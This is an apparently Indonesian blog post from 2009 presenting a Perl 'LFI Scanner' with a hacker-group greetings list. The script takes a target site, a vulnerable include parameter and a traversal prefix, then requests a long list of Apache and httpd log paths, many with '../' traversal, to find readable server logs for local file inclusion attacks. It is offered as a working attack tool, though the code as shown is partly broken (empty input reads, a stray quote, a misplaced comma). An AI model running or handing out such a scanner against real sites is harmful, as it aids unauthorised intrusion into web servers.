Loading

Friday, July 3, 2009

LFI Scaner

use LWP::UserAgent;
use HTTP::Request;

$t = LWP::UserAgent->new() or die ('Error');
$t->agent('Mozilla');

print "[~] LFI Scanner \n";
print "[~] Masukkan Site (ex: www.site.com) : ";
chomp($site = );
print "[~] Masukkan Path (ex: /file.php?lfi=) : ";
chomp($path = );
print "[~] Masukkan LFI Vuln (ex: ../../../) : ";
chomp($lfi = );
print "[~] Options : 1 = null 2 = : ";
chomp($opts = );

@list = (
"apache/logs/error.log",
"apache/logs/access.log",
"apache/logs/error.log",
"var/log/httpd/access_log",
"apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"var/log/httpd/error_log",
"apache/logs/error.log",
"apache/logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"etc/httpd/logs/access_log",
"etc/httpd/logs/access.log",
"etc/httpd/logs/error_log",
"etc/httpd/logs/error.log",
".. /var/www/logs/access_log",
"/var/www/logs/access_log",
"var/www/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/access.log",
"var/log/apache/access_log",
"var/log/apache/access.log",
"var/log/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"usr/local/apache/logs/error_log",
"usr/local/apache/logs/error.log",
"var/log/apache/error_log",
"var/log/apache/error.log",
"var/log/access_log",
"var/log/error_log",
"/apache/logs/error.log",
"/apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"/apache/logs/error.log",
"/apache/logs/access.log",
"/etc/httpd/logs/acces_log",
"/etc/httpd/logs/acces.log",
"/etc/httpd/logs/error_log",
"/etc/httpd/logs/error.log",
"/var/www/logs/access_log",
"/var/www/logs/access.log",
"/usr/local/apache/logs/access_log",
"/usr/local/apache/logs/access.log",
"/var/log/apache/access_log",
"/var/log/apache2/access_log",
"/var/log/apache/access.log",
"/var/log/apache2/access.log",
"/var/log/access_log",
"/var/log/access.log",
"/var/www/logs/error_log",
"/var/www/logs/error.log",
"/usr/local/apache/logs/error_log",
"/usr/local/apache/logs/error.log",
"/var/log/apache/error_log",
"/var/log/apache2/error_log",
"/var/log/apache/error.log",
"/var/log/apache2/error.log",
"/var/log/error_log",
"/var/log/error.log",
"../../../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../../../var/log/httpd/error_log",
"../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../var/log/httpd/error_log,"
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../apache2/logs/error.log",
"../apache2/logs/access.log",
"../../apache2/logs/error.log",
"../../apache2/logs/access.log",
"../../../apache2/logs/error.log",
"../../../apache2/logs/access.log",
"../../../../apache2/logs/error.log",
"../../../../apache2/logs/access.log",
"../../../../../apache2/logs/error.log",
"../../../../../apache2/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../../usr/local/apache2/logs/access_log",
"../../../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../../usr/local/apache2/logs/error_log",
"../../../../../../../../../../usr/local/apache2/logs/error.log",
"../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../../var/log/httpd/access_log",
""../../../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../../var/log/httpd/error_log",
"../../../../../../../../../../var/log/httpd/error.log",
"../../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../../var/log/apache2/access_log",
"../../../../../../../../../../var/log/apache2/access.log",
"../../../../../../../../../../var/log/apache2/error_log",
"../../../../../../../../../../var/log/apache2/error.log",
"../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../var/log/access.log",
"../../../../../../../../../../var/log/error_log",
"../../../../../../../../../../var/log/error.log",
"../../../../../../../../../../opt/lampp/logs/access_log",
"../../../../../../../../../../opt/lampp/logs/error_log",
"../../../../../../../../../../opt/xampp/logs/access_log",
"../../../../../../../../../../opt/xampp/logs/error_log",
"../../../../../../../../../../opt/lampp/logs/access.log",
"../../../../../../../../../../opt/lampp/logs/error.log",
"../../../../../../../../../../opt/xampp/logs/access.log",
"../../../../../../../../../../opt/xampp/logs/error.log",
"../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log",
"../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/error.log",
"../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../../apache/logs/error.log",
"../../../../../../../../apache/logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../logs/error.log",
"../../../../../../logs/access.log",
"../../../../../../../logs/error.log",
"../../../../../../../logs/access.log",
"../../../../../../../../logs/error.log",
"../../../../../../../../logs/access.log",
"../../../../../../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/log/error_log"
);

if (!$opts)
{
print "[~] Masukkan Options\n";
exit;
}
else
{
print "\nScanning...\n";
foreach $lo (@list)
{
if ($opts == '1')
{
$attack = "http://$site/$path$lfi$lo";
}
else
{
$attack = "http://$site/$path$lfi$lo";
}

$r = $t->request(HTTP::Request->new(GET=>$attack));
$test = 'GET /';
if ($r->content =~/$test/)
{
print "[~] Found Logs File : $attack\n";
exit;
}
else
{
print "[~] Trying...\n";
}
}
}
print "[~] Done\n";


--------------------------------------

oO0::::: Greetz and Thanks: :::::0Oo.
Tuhan YME
My Parents
SPYRO_KiD
y3dips
K-159
bius
lirva32
And Also My LuvLy :
..::.E.Z.R (The deepest Love I'v ever had..).::..

in memorial :
1. Monique (terima kasih atas semua kenangan terindah yang pernah kau berikan)

MAAF ATAS SEMUA DOSA DAN SALAHKU

oO0:::A hearthy handshake to: :::0Oo
~ Crack SKY Staff
~ Echo staff
~ antijasakom staff
~ jatimcrew staff
~ boys_rvn1609, arthemist, opt1lc, m_beben, gitulaw, luvrie, poniman_coy, ThePuzci, x-ace, newbie_z, petunia, jomblo.k, hourexs_paloer, cupucyber, kucinghitam, jaqk
~ All people in SMAN 3
~ All members of spyrozone
~ All members of echo
~ All members of newhack
~ All members of jatimcrew
#e-c-h-o, #K-elektronik, #newhack, #Solohackerlink, #YF, #defacer, #manadocoding

Label:

Diposting oleh Shamus di 12:55 AM  

0 komentar:

Post a Comment

Subscribe to: Post Comments (Atom)

Categories

Stats

kumpulblogger